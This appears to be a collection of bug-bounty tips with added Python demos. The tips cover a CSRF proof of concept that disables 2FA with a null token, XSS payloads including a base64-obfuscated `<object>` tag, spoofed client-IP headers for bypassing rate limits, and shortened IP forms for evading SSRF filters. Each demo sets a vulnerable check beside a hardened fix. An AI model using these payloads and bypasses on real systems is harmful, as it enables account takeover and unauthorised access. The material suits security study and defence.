CSRF for disabling 2FA
1. Capture the "disable 2FA" request in Burp Suite
2. Engagement tools > Generate CSRF PoC
3. Pass null characters as the CSRF token value so the server-side token check is overridden
4. Submit the PoC twice to override the setting
5. 2FA disabled
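An added example (not from the original post) of what step 3 relies on and what the PoC looks like: a server-side token check that only compares the token when it is "present", so a null or empty value skips the comparison, beside a hardened check, plus a generator for the auto-submitting form that Burp's "Generate CSRF PoC" produces. The session token and the endpoint are constructed for the demo.

```python
import hmac
import html

# Constructed session token for the demo; a real app stores one per session.
SESSION_TOKEN = "c0ffee1234567890abcdef"


def validate_token_vulnerable(submitted, expected=SESSION_TOKEN):
    """Models a check that only compares the token when one "is present".

    Stripping NUL bytes (or a framework doing it for us) leaves an empty
    string, which is falsy, so the comparison is skipped and the request passes.
    """
    token = (submitted or "").replace("\x00", "")
    if token and token != expected:
        return False
    return True


def validate_token_hardened(submitted, expected=SESSION_TOKEN):
    """Require a non-empty token and compare it in constant time."""
    if not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(submitted.encode(), expected.encode())


def build_csrf_poc(action, fields, method="POST"):
    """Auto-submitting form, the shape Burp's 'Generate CSRF PoC' emits.

    Values are HTML-escaped so the PoC page itself is well-formed. An empty
    csrf_token is the step-3 payload; use %00 in a URL-encoded body if the
    target needs literal null characters rather than an empty value.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}" />'
        for k, v in fields.items()
    )
    return (
        "<html><body>\n"
        f'  <form id="f" action="{html.escape(action, quote=True)}" method="{method}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('f').submit();</script>\n"
        "</body></html>\n"
    )


if __name__ == "__main__":
    # Hypothetical endpoint; not from the original post.
    print(build_csrf_poc("https://target.example/settings/2fa/disable",
                         {"csrf_token": "", "two_factor": "off"}))
    for candidate in ("", "\x00", None, "wrong", SESSION_TOKEN):
        print(repr(candidate),
              "vulnerable:", validate_token_vulnerable(candidate),
              "hardened:", validate_token_hardened(candidate))
```

The vulnerable pattern is the common `if token and token != expected` shortcut; the fix is to reject a missing or empty token outright, then compare with `hmac.compare_digest`.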
#XXE
https://spaceraccoon.dev/a-tale-of-two-formats-exploiting-insecure-xml-and-zip-file-parsers-to-create-a
https://0xatul.github.io/posts/2020/02/external-xml-entity-via-file-upload-svg/
https://mahmoudsec.blogspot.com/2019/08/exploiting-out-of-band-xxe-using.html
https://github.com/setuid0-sec/Swiss_E-Voting_Publications/blob/master/xxe_setuid0.pdf
https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
https://corben.io/XSS-to-XXE-in-Prince/
https://medium.com/@zain.sabahat/an-interesting-xxe-in-sap-8b35fec6ef33
#bugbounty,#bugbountytips
Recently found a reflected XSS (RXSS) in a captcha response
Solve captcha --> capture request --> change the captcha response to an XSS payload --> XSS triggers
#BugBounty #BugBountyTip #BugBountyTips
https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/
https://github.com/fox-it/LDAPFragger
Rate limit bypass:
Add one or more of these headers to the request:
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
If the bypass works but requests start getting blocked again after a while, increment the last octet of the IP.
#infosec #bugbounty
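An added example (not part of the original tip) showing why these headers work and how to close the hole: a rate limiter keyed on whatever client-IP header the request carries versus one that only trusts X-Forwarded-For when the peer is a known proxy and then reads the hop that proxy appended. The simulation rotates the spoofed address by incrementing the last octet, as the tip suggests. Proxy address, client address and request counts are constructed.

```python
import ipaddress
from collections import defaultdict

# Header names from the tip; a naive server may honour any of them.
IP_HEADERS = [
    "X-Originating-IP", "X-Forwarded-For", "X-Remote-IP", "X-Remote-Addr",
    "X-Client-IP", "X-Host", "X-Forwarded-Host",
]

# Constructed: the only load balancer actually in front of the app.
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip_vulnerable(remote_addr, headers):
    """Use the first client-IP header present; the attacker controls the key."""
    lower = {k.lower(): v for k, v in headers.items()}
    for name in IP_HEADERS:
        value = lower.get(name.lower())
        if value:
            return value.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, headers):
    """Honour X-Forwarded-For only from a trusted proxy, and take the hop that
    proxy appended (rightmost), never the attacker-supplied left end."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
            return hop
        except ValueError:
            continue
    return remote_addr


class RateLimiter:
    """Fixed-window counter keyed on whatever client-IP function it is given."""

    def __init__(self, limit, key_fn):
        self.limit = limit
        self.key_fn = key_fn
        self.counts = defaultdict(int)

    def allow(self, remote_addr, headers):
        key = self.key_fn(remote_addr, headers)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def next_spoof(ip):
    """Increment the last octet, as the tip suggests once a spoofed IP gets blocked too."""
    a, b, c, d = (int(x) for x in ip.split("."))
    return f"{a}.{b}.{c}.{(d + 1) % 256}"


def simulate(key_fn, attempts, limit=3):
    """Count how many of `attempts` requests get through when the attacker
    rotates X-Forwarded-For each time the limiter starts blocking.

    Constructed topology: real client 203.0.113.7 -> proxy 10.0.0.5 -> app.
    The proxy appends the true peer to whatever X-Forwarded-For it received."""
    limiter = RateLimiter(limit, key_fn)
    spoof = "198.51.100.1"
    allowed = 0
    for _ in range(attempts):
        proxied = {"X-Forwarded-For": f"{spoof}, 203.0.113.7"}
        if limiter.allow("10.0.0.5", proxied):
            allowed += 1
        else:
            spoof = next_spoof(spoof)
    return allowed


if __name__ == "__main__":
    print("header-trusting limiter let through:", simulate(client_ip_vulnerable, 20))
    print("proxy-aware limiter let through:   ", simulate(client_ip_hardened, 20))
```

With a limit of 3 per key, the header-trusting limiter lets 15 of 20 requests through because every fourth request just costs the attacker a new spoofed octet; the proxy-aware one stops at 3 regardless of what the client sends.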
Bug bounty tips #3
Shorten IP addresses by dropping zero octets to bypass WAF filters for SSRF, open redirect, or anywhere an IP address is blocked.
Examples:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
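An added example (not from the original tip) of the parser mismatch behind this bypass: a strict filter (`ipaddress`) rejects "192.168.1" as not-an-IP and lets it through, while the fetcher's libc `inet_aton` expands it to 192.168.0.1. The fix is to canonicalise with the same lenient parser before matching. The denylist is constructed; on Linux the shorthand rules are glibc's.

```python
import ipaddress
import socket

# Constructed denylist for an SSRF / open-redirect filter.
BLOCKED = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
)]


def canonical_ipv4(host):
    """Expand inet_aton shorthand to a dotted quad, or None for non-literals.

    inet_aton fills dropped components with zeros ("1.1" -> 1.0.0.1,
    "192.168.1" -> 192.168.0.1), which is the address the HTTP client
    will actually connect to."""
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return socket.inet_ntoa(packed)


def is_blocked_naive(host):
    """Strict parser: shorthand is "not an IP", so it matches no blocked range."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(ip in net for net in BLOCKED)


def is_blocked_canonical(host):
    """Normalise with the same parser the fetcher uses before matching."""
    canon = canonical_ipv4(host)
    if canon is None:
        return False  # hostnames need a resolve-then-check step, not shown here
    ip = ipaddress.ip_address(canon)
    return any(ip in net for net in BLOCKED)


if __name__ == "__main__":
    for host in ("1.0.0.1", "1.1", "192.168.0.1", "192.168.1", "127.1", "example.com"):
        print(f"{host:14} -> {canonical_ipv4(host)!s:14} "
              f"naive={is_blocked_naive(host)!s:5} canonical={is_blocked_canonical(host)}")
```

inet_aton also accepts octal and hex components and a single 32-bit integer, so a filter that normalises this way covers those variants too; a hostname still needs to be resolved and the resulting addresses checked.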
XSS payload for a JavaScript application:
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>
#xss #payload #payloads #bugbountytips
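An added example covering both the captcha-response RXSS above and this `<object>` payload (not code from either post): an unescaped reflection beside its `html.escape` fix, a constructed keyword blocklist of the kind the payload is built to slip past, and a lenient data-URI decoder that shows what the base64 body is. The blocklist and the captcha template are constructed.

```python
import base64
import html
import re
from urllib.parse import unquote


def render_captcha_error_vulnerable(captcha_response):
    """Reflect the submitted captcha answer into the page unescaped."""
    return f"<p>Captcha check failed for: {captcha_response}</p>"


def render_captcha_error_hardened(captcha_response):
    """Same template with the reflected value HTML-escaped (text context)."""
    return f"<p>Captcha check failed for: {html.escape(captcha_response, quote=True)}</p>"


# Constructed keyword blocklist: matches obvious script tags and the
# canonical spelling of an HTML data URI, but not the padded variant.
NAIVE_BLOCKLIST = re.compile(r"<script|javascript:|data:text/html;base64", re.I)


def naive_filter_blocks(payload):
    return bool(NAIVE_BLOCKLIST.search(payload))


def decode_data_uri(uri):
    """Decode a data: URI the way lenient browser parsers do.

    Everything before the first comma is the media type plus ';'-separated
    parameters; empty parameters are ignored, so 'text/html;;;;;base64'
    still means base64-encoded text/html."""
    if not uri.lower().startswith("data:"):
        raise ValueError("not a data URI")
    meta, _, body = uri[5:].partition(",")
    params = [p for p in meta.split(";") if p]
    mediatype = params[0] if params else "text/plain"
    if "base64" in (p.lower() for p in params[1:]):
        return mediatype, base64.b64decode(body).decode("utf-8", "replace")
    return mediatype, unquote(body)


OBJECT_PAYLOAD = ("<object data='data:text/html;;;;;base64,"
                  "PHNjcmlwdD5hbGVydGBZMDAwYDwvc2NyaXB0Pg=='></object>")


def extract_object_data(tag):
    """Pull the data= attribute value out of an <object> tag."""
    m = re.search(r"""data=['"]([^'"]+)['"]""", tag)
    return m.group(1) if m else None


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"
    print(render_captcha_error_vulnerable(probe))
    print(render_captcha_error_hardened(probe))
    print("blocklist stops <script>:", naive_filter_blocks(probe))
    print("blocklist stops <object>:", naive_filter_blocks(OBJECT_PAYLOAD))
    print("object payload decodes to:", decode_data_uri(extract_object_data(OBJECT_PAYLOAD)))
```

Escaping the reflected value (or, better, a templating engine that escapes by default) fixes the captcha case; keyword blocklists do not, because the script in the `<object>` payload only exists after base64 decoding and the extra semicolons break the one string the filter was looking for.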